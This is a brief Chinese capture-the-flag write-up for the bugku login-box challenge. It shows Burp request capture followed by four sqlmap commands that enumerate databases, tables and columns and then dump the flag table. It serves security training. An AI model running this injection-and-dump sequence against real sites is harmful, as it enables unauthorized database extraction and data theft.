bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)

题目
http://123.206.87.240:9001/sql/
bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)
随便输入账号密码,然后打开burp进行拦截,并生成该页面的文件,保存到本地

bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)
然后使用sqlmap工具
构造相应语句
首先爆数据库

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name --dbs

bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)

继续爆该数据库下的表

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 --tables

bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)

继续爆相应表的列名

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 -T flag1 --columns

bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)

最后爆出列名内容

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 -T flag1 -C flag1 --dump

bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)

最后得到flag!